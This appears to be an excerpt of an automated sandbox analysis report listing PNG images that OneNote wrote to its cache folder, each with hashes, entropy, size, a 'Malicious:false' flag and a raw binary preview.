                                                                                                                                                                                                                  SSDEEP:384:jgxmx2Fa/+76A6M6Y7rSYRv47cwbkkapeIiRmDGd+gUwOSpQ:KgyoWrJWRkkRXmad+gE8Q
                                                                                                                                                                                                                  MD5:830632032C7DDBCCDE126F4BAE935540
                                                                                                                                                                                                                  SHA1:9FEF1DA9FF1D7762B779553B5F873BE54C8D01EF
                                                                                                                                                                                                                  SHA-256:2328D09EC845433DC31808FD6B12616F1D28B9B3BA7DD969ADEB6C32D8EB049A
                                                                                                                                                                                                                  SHA-512:5C17EF9A0063499F2C34FAB2C4D968D29E20F20868921FA914E5737995AA0C166F224995109FF7ACA57B5B0F8647715DC670C4AEE385F61B5F8E6E8422C49EA8
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR.............w.pl....sRGB.........gAMA......a.....pHYs..........o.d..5>IDATx^....E...,"o.....&....AY$....AE..".l....+G.>AP@D..e..".".A.Y.@...K..IXB !..!..c1.On...===3=.3=.>9O..u....w.z..-].t9]B@...!.......Z...B@...^G`.Q.&S..u$d....B.Y..P.w5[]......B.m.D...! ..@...Ls.Q"....."S....B ..D.9.(.B@.....b@...!..."..@..! ....T1 ........i. J....B@d....B@...4..%B...! 2U...! .r@@d....!......*......9 2..D...B@..L..B@..........D..! .D...! ..@...Ls.Q"....."S....B ..D.9.(.B@.....b@...!..."..@..! ....T1 ........i. J....B@d....B@...4..%B...! 2U...! .r@@d....!......*......9 2..D...B@......5jT.@.{..O.;k....>.._o.+......{V...&C..(?.m.....F....gd.....?.....3u..x^L.1n^...@../.....XE....L..!...t.....L..B.).=..sn..U........@.O..$..o..L.....g.(D...(....Lo8.....,....f;o..i.f.h.9........\./..[W.9.....+....,X..+.d.....Xc..7.p.m.Yg.u:YO.V..l.t.].Z.g.U...]...5.^..._.~.WL...o.3f..s.,Y.X.7.x5...K/-..._.......{........W.(Y....?...!....W;.....iwNMW.............@+Q.5.#.

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\00000013.bin (copy)

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 185 x 76, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):2332
                                                                                                                                                                                                                  Entropy (8bit):7.8822150338370776
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:48:jB5Gg4vMs30WIn5IVeRy1bY7DqbqQBAeNjukXlN4AXat:PGYuEWV/YH7e1uA0AXat
                                                                                                                                                                                                                  MD5:91CB7F1273AA003076401081B8A22237
                                                                                                                                                                                                                  SHA1:5157144069E7D2FDAE60B397BE5851E75BDF7707
                                                                                                                                                                                                                  SHA-256:80682DD6472E8D1136BC5E20F6DE87B595562414B19EAB8E965736FE992921B0
                                                                                                                                                                                                                  SHA-512:5A8E3C0ED0DB94BFE359C63793F12F3D7B3C37F3A13A5C96634BA1DC8C9E50FB1142FE4752FD9FBFA39A682F78C54AF868AD337EAA787801FE5F66D8F55A8196
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR.......L.............sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.\.LUe......Ji("....9....-.."..5L.Y.Y.....$350.."2.lK3Cg...T..DWZ.......i.?!<..~x..z.......w.sw......9....s...w..l6.:....p"dH...F..B<...qE,R$G\!..E..".).#...."..{f.PyI.d..l;....;.=.S...O.S[.\Y^P.aj]9*Y!. ..~..#...S.s...l..h.[m....%...P..@.kG......G..X.r|%..AO.}-..G>35..c....Ac.&[W.d..+...zG........=..l...VS.d..+...tGd..k-._.....oL.:}.p.~.W$C..|...I...n...~......,.i......e..=..?{......>r~.Lw.+2..\w.)w~...c....h..u..%...PE...f..'..m.ZE.1.\....U.`X......$...P%..UH{[K..o7~.k.49..W.t.~.^_..7.,....f."q....+....;...~;.c.......Xb.\?...........0h.lV..WX!.....ljm.1c..U...[..X.)......B=.0~..W...rO..j...ehI5U:..66V5sJ.....V...]Y>...1kQH..2.........d....S....I...+..].p.....m7...Z....s.D>.K/]..?.l....2..=..~.mq..".+.....,..8. v.o.).Z......>..Xv..i...TA....M.....>[X...Y.7lJ..e7..S.....02q.O&9.......:L....N.......W....d..FqE..T..N.....R....kXv[..j......g.K.\@`.M..B}8n

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\00000014.bin (copy)

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):11332
                                                                                                                                                                                                                  Entropy (8bit):7.9324721568775285
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:192:vpXZavBpl00n1Pt7JquG9GYHDK/5cxektxMQjcie9ZZkx30eXJIb8FKRN:vpZaDyc1P1Je9G62/5clpjre9nQkeXJY
                                                                                                                                                                                                                  MD5:31579CA3352DF8FA4E3E7F48C7CDF672
                                                                                                                                                                                                                  SHA1:AA682A3C781BF8EE43B5EDC9718E64CB79135F25
                                                                                                                                                                                                                  SHA-256:B0E7824BEE2C896279457D87E61E902431BEB528D830524CC4DFAE126E89FC24
                                                                                                                                                                                                                  SHA-512:782FF9492E3ECB11C72D316DDD94D1F3E94CD908FC9452A37DA6CA30ABCFE9AB2BCCED8583A569DA68626BCEC730408AF86997E295637BF64AFF5BC768F3E309
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR................R....sRGB.........gAMA......a.....pHYs..........o.d..+.IDATx^.{...u./-...&....6..+z..Q."b*. &M.d-e.*.. ....J..Z-T.Z$....R..F...%*`bn..<.....W.E ..w....^...;g..[w.5w.9g...3......t8t.P.?$@.$@.5...=.8qb.... ...5...a=...#.y. ...@B.....am. .. .......$@.$`.....G.B.$@..S... ...C.zj.#[!.. ..).......!@=..........}..H.........VH..H.z.>@.$@.v.PO.pd+$@.$@=e. .. .;...v8... ...................f.o_o{....~t...n.S.N..?..._..L;J.H ..,....7.}...|....7...b...|.........ObVa1. .?.X.....~.....t2..V>.b.}..0.F....%`GO7.n#~..F....K.~...FX..H.^....k.Z/.2v.W..M.<.;$...v.t..,UO.-]............D.....o.J..Y........5.%.l....{.....'O..dC$....=uks..;{x.,.N.=.."..Q]..w>.E.H........AV=...f.&. ..ip}._0.~[pf.`..9..v.W.,..2.E.$P........+...OcC.H..=..|..[..g%(h.....W...?...UDh..T$..?....|.]..)?[Wo.h.'..2P.1..!.......$.NO.5..}...c.;...~.x,|Q....B..6.@>..y..}...m...D~z....L#.0`_.`.s?|....I.....a...=N....c.._.2.._..6 .]...5....{.^>.lM..;n...k..9J..S.G..{.

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\00000015.bin (copy)

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 167 x 92, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):4181
                                                                                                                                                                                                                  Entropy (8bit):7.943341403425058
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:96:b6JWqvCl45Da8kuGzhRwZvwIutfij19MQ8EpW14LBGJVCq:b6JTCl45DalsBws1R8914V5q
                                                                                                                                                                                                                  MD5:817D5A35EDB2B0E052194D4F49FDA19C
                                                                                                                                                                                                                  SHA1:FA6CB2016C5F43B76102B63D60359139227E07EA
                                                                                                                                                                                                                  SHA-256:0A87B8418B7F8E6E117BADDA11D7CDD38B8B7320C6BA3D3E9AF93EB9ACB2CE14
                                                                                                                                                                                                                  SHA-512:E0686BDBFC589401F0EAAE2B1598199EFA285F8392742B1C928B9274088804B23DCB584B6FEF68CE6D7E54DFF9C10338104F4C0F3F80A04471F0B2E8F9935CC0
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR.......\......!2a....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.]iPTW..iv..D.....%DQ#A$...d..h,.T~..+...TM\cj*.)k.fj~L~$...L&...,...:.FdU..f_......._.n.m.....q.s.9.=..w.9......$..b.*..%....@A]A..%..<......l.h.+../..OSe.....]...>..C........^cCy.0nz.4<......g..?~..>.1ws.B....07W65.74T....=..v.......D....6.....tR....}]}....4z..^....7..;.."......^.....|=.#.=.32..o.<.Tn*Q....g.zN...n*...!/.........!....F..]...6...m...CX..~...+..U...E.|.........7]=rE?i(..$`e.%.`.....w._.Y...l.1...@....t.P..=.}..*...N...N.|.xS.5&.....Pe......Z.Z^XJkx.....^.....?7..._....Wsz......}G..]...\.....,[.y....}.J....'.R?a...G5..l.i.?....MH..l.DC^._.c.m.....%{;z.&.*+x;...S.....zxyH..`.._]...el^........U.T..^..p..z[.6(2x..,#;o##..}Zv|Z..............V.....0}Z....]..m.....x..).k]&e.._.W!Vry..%...I..d..}w.....^..\............m[.^.3r.......-8......j....>...Q..T..{\V\ptH.?........1..w....FHl...x.....\.`.ei.w..)`...g..V{..Z.....8..........o.._..

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\00000016.bin (copy)

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 221 x 77, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):2599
                                                                                                                                                                                                                  Entropy (8bit):7.903700862190034
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:48:PmCwDJh8w9JewaF2zQNXXj8zq1KM43sxXxjYbTgJW1MFsrJ075CawGjGj:P1Ah8UewaFcgz82Kx8xXNYb3id/yj
                                                                                                                                                                                                                  MD5:E88131C9AAC52649FF044905ACAB9B76
                                                                                                                                                                                                                  SHA1:34AE73B9165CBED0DDF33AC20E4B3E7D622C19BF
                                                                                                                                                                                                                  SHA-256:30F22340F582F9A352A7ED3048D1088F178E83CCAACAC1CCFD86852C8F9C78E3
                                                                                                                                                                                                                  SHA-512:97AFE8F3A2A3138613934AC737C390A35F6757BFC3D381EA7C7CD148F739932380DCD46D0BA6F590C274F8BFB4D4286B3C0433AA69E090102A8A9ABDD7C97EB1
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR.......M.............sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.]kl.U....B|E..>...*..Q........b[.K........m.(..... ...!%1%*-B.C~(&`[.....-.....~.w3..Kw.3wvfzn.2{..s.....{w..\....!.3..:..!..../..zD.x...O.K... ^.1*...8.G...z...D.$...........>!..V..`v.CQQQ!..-L...../3.2......ZH.?s...Iu\N..,3.?.p..N......<....E.<.=z..Iu<ll.dX...g....+.{X.p.....:..t...a...cKK.|...Yszl.N.:......KPs.):).T.5...&B...*..5j``@...(_r.V.j..m...?x.sg...t\.dz.'^.=.\.h..<.y....:.I...w..ze.m.\.qPJu.....D.|..@......W..t.+.....X....e....\H+.Ns%^r.VS.N.3:...&...._..#^....d! ..F.....xc..M...q...17.z...z&C...K9(.Ifm.35.v.>.'X,...p.:=.H...J.K.,...:~...7.t.....R..R..9..?....l../.(...0z0.M.f.)H..Y_"e......B........L...q.K......|;..L.........xI.K3.M..%........./..){....R....s...7....).q.._R.4O.a3......<..%....3#.|>..y...u...R'.P..$Klz...........,...g.....`.7..\...x>.{p\;>+.,.....e.-..Re@.N..FY_....*....]}...[..h.M.oq.S.U...c_}`......8TP....

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\00000017.bin (copy)

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 232 x 50, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):1570
                                                                                                                                                                                                                  Entropy (8bit):7.780157858994452
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:48:r+em8Tlk2APr2fEd72tTqiVJlcLzqeVzYwS:r+erTlk5S+zoyGahS
                                                                                                                                                                                                                  MD5:EF9AA5B2ADBE5DF68AC4F4D716DF7708
                                                                                                                                                                                                                  SHA1:363B93AAAB9DB2832F6CA0EE3C27C9310C344BA8
                                                                                                                                                                                                                  SHA-256:3D94FCC4821A135ABAAE6579011441B94F9C04DAD1E66BB5211B0C019A5968B9
                                                                                                                                                                                                                  SHA-512:EC9B024AEA46F7B97D14F0A7E12704D09B85F0017CC9E273CE50F2F889DFDAE81DE549CCD546BBB8F8BAAAAAB7781FEF77BF783E02CCC9605304552F7DD5903D
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR.......2......n.f....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.[MK.W...t!.fU..b!....*JBA......%-.F.4$.Nw].....E.$...)T......?@.O{...3w..y.=/"o.9...<.y...X....c.1P6..e.lx....0..J....e3.&\.@)............o.*>.E,;.....~..|....Z.3`K..W0S.&.L._..M.e.`..M.....i_.......\...6g..^....4..L.Y.9.$M...4..L.Y.9.$M...4..L.Y.9.$M...4..L.Y.9.$M...4..2.......q...&...........*.Qg.+.p.......a.:.X6...o2......A.....[).,.p......P......_..>......3.......z8j............>...fww.6....../....S<......^%.4........{.N$..`.!H....`........a..(.G^>~|txx....K\mF..'d.d:9J!.....j..i24.A...`O.......s.....?={....H'._..~..O......*>...ZXX.3...;C....\....%..s=...w<h.......0....~..y..._.......+.n.P.M]c...A..Er|.R...$.g...9*._.jg.....x...&+.JWM4xe..^....0...11.[.....f....r#.h.h$....[=t >...r....L.0.KL..B\..x........4J.0....vY...\dA. w...........g....};.}.....;.......x.|.....)......x....s....N.$.n..g<Z.q.a9.C.....oX..%,KNNN..i.8J..p].1....B>{......n.D|3t.-\g...Q

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\00000018.bin (copy)

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 340 x 79, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):4490
                                                                                                                                                                                                                  Entropy (8bit):7.928016176674318
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:96:WXKr7Xwf6Obg+XaGOnsjbbGSb+ydWtRvEOhDE6XqPeosv02tR45boo:3rTUgXZnsHKSb+n+8DdKlwm
                                                                                                                                                                                                                  MD5:7F161B19B937AB48D4FD2F6E5E16FDBD
                                                                                                                                                                                                                  SHA1:BDCE4F1C73E87E609A7FDF245A512CA4F73B35B9
                                                                                                                                                                                                                  SHA-256:C863C5E71D1116D69561BD0637F4FE4C4240E9CED05B8A5B056073AD13E6495D
                                                                                                                                                                                                                  SHA-512:E915B76FAAC9512D2AD11CF4E4530A19BEA1C7D8508BC218C69CB041F1EEABA3E2E03B1D56E61B032A6418829752C21B8354AF1335466D7E1528A06E6742A461
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR...T...O.....;.......sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..p.U..'...rD.WX.... Q.. ....."$.ZHP.Z...C...........R..%G8R..... .R.C6..A.b...0...^...#..g..........z2.....nB...l..X.&._.a,...a,...a,...a,...a,._.73'N..ukeee.6mZ.n.m.G.}...n...a.9s.DGG....y...8??.o.pE1....Y.,......).ca.i.M.:5$$.........Lr...ye........6...8...z.-r....d.(.xc..U..^11...._>.QX..y..2...T...sss1..."A.?_.;w..S.F>......4.G.......D.|...@.K...............C...k...P...q....6.`QQEE................7;;;.._\q.k.|...\.z..6j>..n....Y.&G*.n.S$))).....r........}.{[Dv:,..w..A...`..........a.~.N.f.s...P...*..'7n....eK....+.n;:.W..C..9}..O..D.q..X..5i.s~en.c..F&..?.....l.]3r...W`..#..7o..R.@^..*...W..?}t...{.B.8..D...UPa..~..C...|.C].a.9..R...c.Y0..9.u...d...C.......X.U....WK.....5...'..PM.`...<. ._.z.F^^.EH.K>_.0.d..S...Yj<..~.5.?l.fZ0.@d.....*..G...K.....e...b.|e..Q.4.....('z...!G.....2..XQx\......X...2.\h..X~.e....Z....=....C.1.......w.....d.z.

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\00000019.bin (copy)

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):11449
                                                                                                                                                                                                                  Entropy (8bit):7.91552812501629
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:192:/zgGDSJ0ke0kBER0C31jm1OSZi6/ccccccc3zzRmKHDr1NFnAaLJ5rBX8iaD7:/UGe6m7XdJS86kvRBHD5/nAa95rB9aD7
                                                                                                                                                                                                                  MD5:163E6791C87E4999C343EC5E23843B15
                                                                                                                                                                                                                  SHA1:43CE3BAE19E22876483A7FD0E93DB45790373600
                                                                                                                                                                                                                  SHA-256:DEB2B126977EA150E49CDB3ACF4F5387639C7B7B5583454EDF55ADF83DFAB720
                                                                                                                                                                                                                  SHA-512:98BE1F4684F99A9FD2F313B09A113B5C310EC8BA8EB0EBF5FD69765E5B48B001D39999E3F25A7E76C7344DCF57B4F0BF2E4614FB0E0DFCCB6F02E6D1CAAF7FDD
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR................R....sRGB.........gAMA......a.....pHYs..........o.d..,NIDATx^....E...@^.T.....H..$..(.!..3....O=Q...<.9.`@E...CE.(""..H.$..6.......]3......tW}U...w*~....W./. .. ..........m..H..H... ..........'...G...W.=#.M.$@.$p...........!@=U.VH..H.z.g..H........H+$@.$@=.3@.$@.j.PO.p... ...... .. .5...j8......PO..........o....+.Z.Pb.FH.......D.g\........._..'0.......9.>............&..PO.z..)-..........R....'@=U..I.&.g......../....SO.\.,._.@7Q.g.}V+../..Ht.I=..WZ%.{......_v.....%U.)^H(!!..q....|.H.E.DG_....o../...T.i...z.%.4K..# %.-.(...4J`i..,.P....F.D.zj..#..@.).(...o.....S..)..i.z.g...h..8.......A<d.z....<...n.]...E....(Jj4P;._.N..Q...)..8U.u.e).j.e...E|.]."..t6.[.K..5.6.....B..(.=W./....S'.......z.FY.. ...PO.".tI...F...Q....c.o.....}...r>..3c9I../.......}......I..G.|..|...~.b.e.5.OGb..o.....w....i.e...5&.,Z.H......g..KY.<.nZ.x...HHbdS.Z.\.O..1Q.K...9....Z.L....\g#.._~9###%%.O.>.Rvu..C.....S..g01..j...?-../...Q..N.:._....1.!

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000001C.bin (copy)

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 165 x 131, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):3679
                                                                                                                                                                                                                  Entropy (8bit):7.931319059366604
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:96:tT+LtoQ9jsUBsnwlDGThUe8ww2iJiGEjdKKnnE+Gh:V+Ltt5GwlDQhUe8ww2iJi7MKnnE+K
                                                                                                                                                                                                                  MD5:995CEACAD563F849C4142B6A6F29F081
                                                                                                                                                                                                                  SHA1:44CB3B867CD2917541B7D5AAED2F14F10FEBB0FD
                                                                                                                                                                                                                  SHA-256:3691FB8C60EA1B827092F05FBB1807E34726016C6FF56698D7B81C44D519D22A
                                                                                                                                                                                                                  SHA-512:3C8EFEB966B075D06D8344483352BF92C9292F9970C9377BE254EB355EFAF017916737AECCDC704B84D532B7229F9908951A6F2CC3FAD810791CAB224401AD3D
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR.............c.L.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^....W...Gh...k.Hm..J.m....,X...Eh..%.n.....PHvy$%...[...R..l...(/..-..yl..Z.h..H!.../.|.y|w...7d3s.s.=.{.s.g.6W.^..)..@..{..'O.LL.......c.^.6xS&O.,...J.(|?...............,.$......@.zk....,.$.........)..7]O...mH7..0..|..&j..t..F...T...AZ7z.....$H...AZ7z.....$H...AZ7z.....$H...AZ7z.....$H....W.6.....0...FTcc.Wi....Q)...<.*.....{...#G....Y.f....KKK..,,,4.....{S.`...+O.[..+.\H...(.<..Qy*..ET.PM...c....~(.g..**...ol.K......Sc8..q.F.KM"<...:t.O.>b..$*t..].........2..y.h."!f.08hT..m.(..C.7n.......@....SVUU).F.).X\\....[j.U....$x$d..e...<.W......=;0L78t+..Gw..-....]......C7......K.w..._..g......A.&M.$^.#.!....e.\.P........;vD..@...Za.@*D..f...! .2w...4#.J..c....K}....F.u.I.b.V2.k...5..`....*........M..!.,.;.E..BZ....K..[7....5....,...........K...7+.6..o....\,`...z..5x...\46x.b......Y....s.^.x=.e.4s.W..t,.iu.G^.....(74....`.....:......]..&..j+t9..3..}..

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000001D.bin (copy)

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 127 x 138, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):2232
                                                                                                                                                                                                                  Entropy (8bit):7.837610270261933
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:48:dFQY2WmQbe+TukEC2KgYPsWOuWFk792oP/sWtGOK9Lc+rD0NTHj:3L+wKkEOgx3PG92Eqt9LczFD
                                                                                                                                                                                                                  MD5:EDB5ED43CC6038500A54B90BEC493628
                                                                                                                                                                                                                  SHA1:A8CD63F3914E4347F4C5552FB922C6C03917F45F
                                                                                                                                                                                                                  SHA-256:9F3312E33EB78C6952B5A5D881BBD18751FCFAC41D648C6F053CE781342A504F
                                                                                                                                                                                                                  SHA-512:4EBCEFD69A4C249AA3B0F00A954C4E463DA22FC9CA0B61A0DC46079B438138C509B22188D966FFF6599A3A604858BC4CC8FE6E0685A764E8E0477AB7A237DB32
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR.....................sRGB.........gAMA......a.....pHYs..........o.d...MIDATx^..hVU..}..s:..6..9g.MM3...j...*........A..!.A.....R.Ai%YH..(M.".h.cf*.B.......:...{w.{.......y.s>.{.{.=.........#.y..r.K...K.0}......Y..b..[N.=....j.=........!......./.6....B.8....p....5P)....@......=}............^.~..@.o`n<.q.....Yw]..mg\V*...y.W.T.>...\n...s.iG.~L]..d.<.8..j<.<1..4...CZ0...}...........oDDh.....]3}#"B..O........0}B.F.L......5.f.FD..L....5.7""4`..p.........'.kt.....>!\.k.oDDh.....]3}#"B..O........0}B.F.L......5.f.FD..I..x........Z^...>B$1.N"}4.....1:&F8..*.X.yL(..s.3......~2.EL%.w.Uc.zJ...B..S..b.7o|%..7..'.....N.|..Vi...q..uO,`/....\W{..y...&iI..|X&T.........-........Z..o.~u..U....cF.M....O4}......~......:T..W.._s...t..Dlb.$Pr././.._4.b......R.T$t..$.>hB. +.{......m.w .Q...05..C.}...}.....?..h.....Y .8.6^t....}.y.%......l=$..[.~..]..h..N.......*....SB.|....8..H......_...G...|......;6YQ|WO.o.}]..'.$..oE.y...i'9.[cmS..@m@.Q

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000001E.bin (copy)

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 46 x 49, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):1604
                                                                                                                                                                                                                  Entropy (8bit):7.814570704154439
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:48:4gv2YZ4gWLpU9JcjREmXfFEV7NNkfKOgV60g0Z:KZgWLpSJcj+mPFGNkfngp
                                                                                                                                                                                                                  MD5:3F1535054D4F9626F0EB10CEE47F076E
                                                                                                                                                                                                                  SHA1:92EF4F27A33F7704952ECDBA4FA69C68FC32FD4B
                                                                                                                                                                                                                  SHA-256:4AB29996D02D93CAD184DD05F7A027D00425B90F5657F1E51CC4C37297A0035A
                                                                                                                                                                                                                  SHA-512:2E0EC758B2C28C8DB9F7B5EDBBE8130F049E66842F2F5CC1C013CF23F7C4443CD211BA297250471CDB4F91F1E3251C1E3F7E2151C576FD1A1AE6A36C3776C6E0
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR.......1.....*[......sRGB.........gAMA......a.....pHYs..........o.d....IDATXG.iLTW... .23..,..6 ........kK.5...5..IMh..Tl......V.v.PZ.-F...".k.pCQ......#.../s>f..3s....<...=^'/.~.;.a....{>.g.....*o..6k..k....E....O....aQ.j....X&vG......{u-....$...CX.....xhZ...Q...Z.........O...I..Id.h.....q..q.........Y..J7O7.R...~o...[....;.'n...u.g..>X....o.]}...>...._..u......5...2].......EodZ.R.i....=ryxh...C!..6$!..)..W,^...Q.y...Ay[...M'o...;..hh'....}.%...."..h.5.?=.y.x..2/gK...4.2P.(#S.F.G.o...!Mk...w/._1`.5....[U7.0..Z..w^..&/...G...Y...g..;...JF.t..,.~.'.X...uYd.E...+R....:2cHG9..YC..X..Eg.).r..+%%.t..6/...@....3....|.O|.0.:.l.;........_.....E.J"..:)..#R"..q....~r..-..%.4....b..Q....al..6......{.y...I1.Xs.}..y.;...u.\......sm.C..@ 2.AG.K..5..}.k ..~........4..<..PH|.).Z.[H.G.iH.7UR.`..B.f......<.5n7.*WR.c....I1.......<y.%...-..."Y@.*...)).(...I...y.z6...J2.s...c...z.G..Kj..^R...M..k>.PA.1>.s<.G...8.r.....dL..uF.(...q.P.j@...CPSc..^

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000001F.bin (copy)

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 749 x 126, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):13084
                                                                                                                                                                                                                  Entropy (8bit):7.940058639272698
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:384:o4KSpFN6Ud4c3p2Il1yavNr5spYVJzimlfZ:wGN6Udv4IKavLBJz/r
                                                                                                                                                                                                                  MD5:0693DABBBC411538D209F32E22F622F6
                                                                                                                                                                                                                  SHA1:FB7E675406FA123CDB7E058D336742D6A2E8DC8E
                                                                                                                                                                                                                  SHA-256:2DFB2E7A1A3AA43C673D2EE540D3C366CEB12105EB5441F98992FC06F4284013
                                                                                                                                                                                                                  SHA-512:F07732660EC62DAE58EB02E2E9476007EA92BF826F642BCA547097136AEA01D29FF69D9B0CD0F5D65A5E15AA66CA4AA4804AA171A3504AAB198631C643C90C16
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR.......~.............sRGB.........gAMA......a.....pHYs..........o.d..2.IDATx^.w....'m.9c.6"...&.`.N.(.TN.Ne.N.R.eKr..T.*[...?T..:I.D.S>I$A...I......y.9...f......3...Gh.....}_.o....n..A@.....A@...L...2... ..... .x...#. ..... .....1f]9.[.....A@......3 ..... ...fE@x.YWN.....A@......1...... .....Y..J.Y.N.....s"................./..rc.scuyyyu...\s....t.oi..j..lv.....Gr.#9%%%9%--....d.T...r...DH...6.....%U..A@.0.....rAD ........2.5.......L.R..=W...gZ.`o..-?.T.Cy.:...y.9..y.EE...v......1..R.....1.".... `"...ss.......i.!.hY...Fj*....%.-.Gw...HJJr8..6...#.......!(.?P.(.....8(u........*..OOO..........dgg....Q..=..c.y....A`S.@.......3.CC..GFfg. .I.I.COrJFFFNNV^nn^^.z..%..(...^.b$........a..y.LMO-.,ylV+.k...T>Jg..*//-+-......M=..x.....E.... `~..N.Kww.......z...%%.e.%.yy.i...P.)'.,A.5.d.0.Cc35==66>2::33..>..;..Ii.i.gv...DSd....l#...l..............................)**,**...V..1 .F.'7....)..SSs..7..F...C.p....(*,......(RG..B...l!.2. ....|r1

